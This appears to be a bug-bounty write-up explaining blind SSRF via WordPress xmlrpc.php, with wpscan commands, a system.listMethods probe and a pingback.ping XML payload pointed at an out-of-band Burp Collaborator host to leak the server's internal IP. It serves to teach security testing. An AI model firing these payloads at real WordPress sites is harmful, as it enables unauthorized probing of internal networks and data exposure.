Unauthenticated Blind SSRF

Hello Researchers,

My name is Ashish Rai and Im a bug hunter and a Security Researcher , And Iam back with new vulnerability which is Blind SSRF with the help of XMLRPC.

Lets start:

SSRF

start It

What is XML-RPC ?

XML-RPC on WordPress is actually an API or “application program interface“. It gives developers who make mobile apps, desktop apps and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface. These include:

Publish a post

Edit a post

Delete a post.

Upload a new file (e.g. an image for a post)

Get a list of comments

Edit comments

Now While hunting in a particular website It is very difficult to find a bug Even the vulnerability are mostly find by another researchers. So Today I will talk about XMLRPC to SSRF vulnerability .

While I will call the target as target.com , while testing into the target.com , I have got lots of subdomain and It is good for every hackers , I mean that lots of subdomain means Lots of vulnerability . So I have started basic recon , But aftersome time I have notice that one of the subdomain is using wordpress ,mysql,php and It is interesting I have started with basic wpscan . Like(wpscan -u https://target.com) After that I have executed This command(wpscan — url http://target.com — enumerate p), I got this type of url :

xmlrpc server

In this movement I feel Like moye moye Because the reality is that I don’nt know How to exploit xmlrpc , After some deep researcher I got this medium poc (https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32) , where you can exploit by learning the poc but lets move on to reality , Now my main motive is to exploit xmlrpc .

Step to Reproduce:\

1> Go to burpsuite and enable intercept options and capture the request . It looks like this.

request

2>Now send that request to repeater and change the GET parameter to POST parameter. Now It looks like this.

post

3> you have to test either xmlrpc is vulnerable or Not. you can try this payload to test It.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

It is vulnerable

IF It is vulnerable then It will show somethings like this.

4> Now Lets try Blind SSRF

5>Go to burpsuite collaborator and copy the url(1jlr6trc872q7sg0asm7bao02r8iwakz.oastify.com) and insert this payload .

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

In the http://yourserver field Just change with your burp collaborator url and Send It .

6> Now went to your burp collaborator section and Poll It . If the response will arrive with server internal Ip than It is vulnerable with Blind SSRF .

Internal Ip

Impact:

The vulnerability could be used to conduct further attacks, such as accessinginternal systems or exfiltrating sensitive data.

Please If you like this writeup then clap for It.

Waiting for the response …….